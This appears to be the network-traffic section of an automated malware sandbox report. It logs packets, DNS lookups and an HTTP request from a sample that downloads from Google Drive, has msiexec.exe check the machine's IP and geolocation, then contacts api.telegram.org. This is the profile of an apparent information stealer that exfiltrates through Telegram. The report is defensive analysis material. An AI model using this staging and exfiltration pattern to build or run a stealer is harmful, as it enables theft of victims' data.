Dec 17, 2024 13:21:42.190382004 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.190424919 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.193911076 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.193968058 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.193973064 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.194016933 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.197036028 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.197092056 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.197199106 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.197244883 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.200334072 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.200391054 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.200496912 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.200541019 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.203473091 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.203525066 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.203644037 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.203687906 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.206789970 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.206861973 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.206938028 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.206985950 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.209862947 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.209925890 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.210043907 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.210097075 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.213239908 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.213300943 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.213305950 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.213356972 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.214876890 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.214948893 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.215012074 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.215054989 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.217863083 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.217936039 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.217951059 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.217992067 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.218442917 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.218497038 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.221034050 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.221095085 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.221554041 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.221609116 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.224026918 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.224092007 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.224450111 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.224503040 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.226767063 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.226835966 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.230704069 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.230756044 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.232271910 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.232440948 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.232903957 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.232949972 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.237555027 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.237637043 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.238167048 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.238223076 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.238228083 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.238269091 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.239299059 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.239355087 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.247335911 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.247406960 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.247529030 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.247577906 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.247582912 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:42.247627974 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.252466917 CET	49763	443	192.168.2.7	142.250.181.97
Dec 17, 2024 13:21:42.252477884 CET	443	49763	142.250.181.97	192.168.2.7
Dec 17, 2024 13:21:44.126276016 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:44.246057034 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:44.246828079 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:44.247117043 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:44.366930008 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:45.348414898 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:45.353056908 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:45.472845078 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:45.674164057 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:45.729182005 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:46.491733074 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:46.491782904 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:46.491852045 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:46.493587017 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:46.493599892 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:47.715715885 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:47.715893984 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:47.719420910 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:47.719435930 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:47.719897985 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:47.723014116 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:47.763329029 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:48.160064936 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:48.160182953 CET	443	49784	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:48.160249949 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:48.164737940 CET	49784	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:48.173476934 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:48.293483973 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:48.494707108 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:48.496448040 CET	49790	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:48.496526957 CET	443	49790	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:48.496695042 CET	49790	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:48.496840000 CET	49790	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:48.496853113 CET	443	49790	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:48.541697025 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:49.708699942 CET	443	49790	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:49.710213900 CET	49790	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:49.710230112 CET	443	49790	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:50.157664061 CET	443	49790	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:50.157727957 CET	443	49790	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:50.157783031 CET	49790	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:50.158201933 CET	49790	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:50.161750078 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:50.162853003 CET	49794	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:50.281900883 CET	80	49778	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:50.281996965 CET	49778	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:50.282659054 CET	80	49794	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:50.282763958 CET	49794	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:50.282883883 CET	49794	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:50.402765989 CET	80	49794	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:51.379437923 CET	80	49794	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:51.380989075 CET	49797	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:51.381057978 CET	443	49797	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:51.381164074 CET	49797	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:51.381464005 CET	49797	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:51.381483078 CET	443	49797	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:51.432451963 CET	49794	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:52.592405081 CET	443	49797	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:52.597778082 CET	49797	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:52.597811937 CET	443	49797	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:53.040201902 CET	443	49797	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:53.040277958 CET	443	49797	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:53.040354967 CET	49797	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:53.045254946 CET	49797	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:53.309009075 CET	49794	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:53.310729980 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:53.429136992 CET	80	49794	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:53.429217100 CET	49794	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:53.430490971 CET	80	49802	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:53.430588961 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:53.430732965 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:53.551424980 CET	80	49802	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:54.528269053 CET	80	49802	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:54.529562950 CET	49808	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:54.529596090 CET	443	49808	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:54.529670000 CET	49808	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:54.529953003 CET	49808	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:54.529968023 CET	443	49808	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:54.573137999 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:55.008661985 CET	80	49802	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:55.010102034 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:56.101006985 CET	443	49808	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:56.148758888 CET	49808	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:56.148798943 CET	443	49808	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:56.548054934 CET	443	49808	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:56.548127890 CET	443	49808	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:56.548178911 CET	49808	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:56.548737049 CET	49808	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:56.552186966 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:56.553072929 CET	49813	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:56.672424078 CET	80	49802	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:56.672588110 CET	49802	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:56.672815084 CET	80	49813	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:56.672907114 CET	49813	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:56.673068047 CET	49813	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:56.792717934 CET	80	49813	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:57.788716078 CET	80	49813	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:57.789005995 CET	49813	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:57.790380001 CET	49815	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:57.790446997 CET	443	49815	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:57.790563107 CET	49815	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:57.790863037 CET	49815	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:57.790882111 CET	443	49815	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:57.909202099 CET	80	49813	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:57.909315109 CET	49813	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:59.006701946 CET	443	49815	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:59.008599997 CET	49815	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:59.008671045 CET	443	49815	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:59.451473951 CET	443	49815	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:59.451555967 CET	443	49815	104.21.67.152	192.168.2.7
Dec 17, 2024 13:21:59.451647997 CET	49815	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:59.452161074 CET	49815	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:21:59.456849098 CET	49821	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:59.576638937 CET	80	49821	193.122.130.0	192.168.2.7
Dec 17, 2024 13:21:59.576754093 CET	49821	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:59.577003956 CET	49821	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:21:59.696723938 CET	80	49821	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:00.673755884 CET	80	49821	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:00.674959898 CET	49823	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:00.675031900 CET	443	49823	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:00.675116062 CET	49823	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:00.675363064 CET	49823	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:00.675395966 CET	443	49823	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:00.713632107 CET	49821	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:01.886787891 CET	443	49823	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:01.888494015 CET	49823	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:01.888545990 CET	443	49823	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:02.337064981 CET	443	49823	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:02.337132931 CET	443	49823	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:02.337234020 CET	49823	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:02.337696075 CET	49823	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:02.342714071 CET	49821	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:02.343862057 CET	49828	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:02.462969065 CET	80	49821	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:02.463095903 CET	49821	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:02.463727951 CET	80	49828	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:02.463818073 CET	49828	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:02.464032888 CET	49828	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:02.583776951 CET	80	49828	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:03.560493946 CET	80	49828	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:03.561619043 CET	49834	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:03.561669111 CET	443	49834	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:03.561728001 CET	49834	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:03.561973095 CET	49834	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:03.561990023 CET	443	49834	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:03.604254007 CET	49828	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:04.777795076 CET	443	49834	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:04.779376030 CET	49834	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:04.779397964 CET	443	49834	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:05.227149963 CET	443	49834	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:05.227339029 CET	443	49834	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:05.227515936 CET	49834	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:05.227808952 CET	49834	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:05.231131077 CET	49828	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:05.232309103 CET	49835	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:05.351347923 CET	80	49828	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:05.351418972 CET	49828	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:05.352274895 CET	80	49835	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:05.352361917 CET	49835	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:05.352478027 CET	49835	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:05.472239017 CET	80	49835	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:06.465234995 CET	80	49835	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:06.506388903 CET	49841	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:06.506423950 CET	443	49841	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:06.506557941 CET	49841	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:06.506803036 CET	49841	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:06.506822109 CET	443	49841	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:06.510523081 CET	49835	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:07.723253965 CET	443	49841	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:07.725981951 CET	49841	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:07.726011992 CET	443	49841	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:08.174711943 CET	443	49841	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:08.174885988 CET	443	49841	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:08.174951077 CET	49841	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:08.175282001 CET	49841	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:08.178061008 CET	49835	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:08.179193020 CET	49847	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:08.298180103 CET	80	49835	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:08.298310041 CET	49835	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:08.299088001 CET	80	49847	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:08.299185991 CET	49847	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:08.299333096 CET	49847	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:08.419162035 CET	80	49847	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:09.395684958 CET	80	49847	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:09.396851063 CET	49848	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:09.396898031 CET	443	49848	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:09.397047997 CET	49848	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:09.397218943 CET	49848	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:09.397231102 CET	443	49848	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:09.453877926 CET	49847	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:10.614305019 CET	443	49848	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:10.615930080 CET	49848	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:10.616005898 CET	443	49848	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:11.060173035 CET	443	49848	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:11.060338974 CET	443	49848	104.21.67.152	192.168.2.7
Dec 17, 2024 13:22:11.060409069 CET	49848	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:11.060815096 CET	49848	443	192.168.2.7	104.21.67.152
Dec 17, 2024 13:22:11.090630054 CET	49847	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:11.210689068 CET	80	49847	193.122.130.0	192.168.2.7
Dec 17, 2024 13:22:11.210807085 CET	49847	80	192.168.2.7	193.122.130.0
Dec 17, 2024 13:22:11.228512049 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:11.228547096 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:11.228620052 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:11.229089022 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:11.229104042 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:12.603363037 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:12.603497028 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:12.605509043 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:12.605515957 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:12.605870008 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:12.607405901 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:12.655337095 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:13.113717079 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:13.113889933 CET	443	49854	149.154.167.220	192.168.2.7
Dec 17, 2024 13:22:13.113960028 CET	49854	443	192.168.2.7	149.154.167.220
Dec 17, 2024 13:22:13.116178036 CET	49854	443	192.168.2.7	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 13:21:33.255321980 CET	58496	53	192.168.2.7	1.1.1.1
Dec 17, 2024 13:21:33.392554045 CET	53	58496	1.1.1.1	192.168.2.7
Dec 17, 2024 13:21:36.735153913 CET	62504	53	192.168.2.7	1.1.1.1
Dec 17, 2024 13:21:36.874860048 CET	53	62504	1.1.1.1	192.168.2.7
Dec 17, 2024 13:21:43.981441021 CET	50410	53	192.168.2.7	1.1.1.1
Dec 17, 2024 13:21:44.122992992 CET	53	50410	1.1.1.1	192.168.2.7
Dec 17, 2024 13:21:46.349853992 CET	52737	53	192.168.2.7	1.1.1.1
Dec 17, 2024 13:21:46.490920067 CET	53	52737	1.1.1.1	192.168.2.7
Dec 17, 2024 13:22:11.090507984 CET	56532	53	192.168.2.7	1.1.1.1
Dec 17, 2024 13:22:11.227705002 CET	53	56532	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 13:21:33.255321980 CET	192.168.2.7	1.1.1.1	0x2015	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:36.735153913 CET	192.168.2.7	1.1.1.1	0x8719	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:43.981441021 CET	192.168.2.7	1.1.1.1	0x7e56	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:46.349853992 CET	192.168.2.7	1.1.1.1	0x469b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:22:11.090507984 CET	192.168.2.7	1.1.1.1	0x2a0e	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 13:21:33.392554045 CET	1.1.1.1	192.168.2.7	0x2015	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:36.874860048 CET	1.1.1.1	192.168.2.7	0x8719	No error (0)	drive.usercontent.google.com		142.250.181.97	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:44.122992992 CET	1.1.1.1	192.168.2.7	0x7e56	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 17, 2024 13:21:44.122992992 CET	1.1.1.1	192.168.2.7	0x7e56	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:44.122992992 CET	1.1.1.1	192.168.2.7	0x7e56	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:44.122992992 CET	1.1.1.1	192.168.2.7	0x7e56	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:44.122992992 CET	1.1.1.1	192.168.2.7	0x7e56	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:44.122992992 CET	1.1.1.1	192.168.2.7	0x7e56	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:46.490920067 CET	1.1.1.1	192.168.2.7	0x469b	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:21:46.490920067 CET	1.1.1.1	192.168.2.7	0x469b	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 17, 2024 13:22:11.227705002 CET	1.1.1.1	192.168.2.7	0x2a0e	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49778	193.122.130.0	80	7304	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 13:21:44.247117043 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
